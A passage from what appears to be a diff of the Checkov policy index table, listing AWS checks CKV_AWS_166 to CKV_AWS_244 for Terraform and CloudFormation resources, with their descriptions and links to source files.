[BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) | +| 542 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) | +| 543 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) | +| 544 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 545 | CKV_AWS_168 | resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) | +| 546 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) | +| 547 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 548 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) | +| 549 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) | +| 550 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 551 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 552 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 553 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 554 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 555 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | +| 556 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | +| 557 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 558 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 559 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 560 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 561 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 562 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 563 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 564 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 565 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 566 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 567 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 568 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 569 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 570 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | +| 571 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 572 | CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 573 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 574 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 575 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 576 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 577 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 578 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 579 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 580 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 581 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 582 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 583 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 584 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 585 | CKV_AWS_195 | resource | AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 586 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 587 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 588 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 589 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 590 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 591 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 592 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 593 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 594 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 595 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 596 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 597 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 598 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 599 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 600 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 601 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 602 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 603 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 604 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 605 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 606 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 607 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 608 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 609 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 610 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 611 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 612 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 613 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 614 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 615 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 616 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 617 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 618 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 619 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 620 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 621 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 622 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 623 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 624 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 625 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 626 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 627 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 628 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 629 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 630 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 631 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 632 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 633 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 634 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 635 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 636 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 637 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 638 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 639 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 640 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 641 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 642 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 643 | CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 644 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 645 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 646 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 647 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | 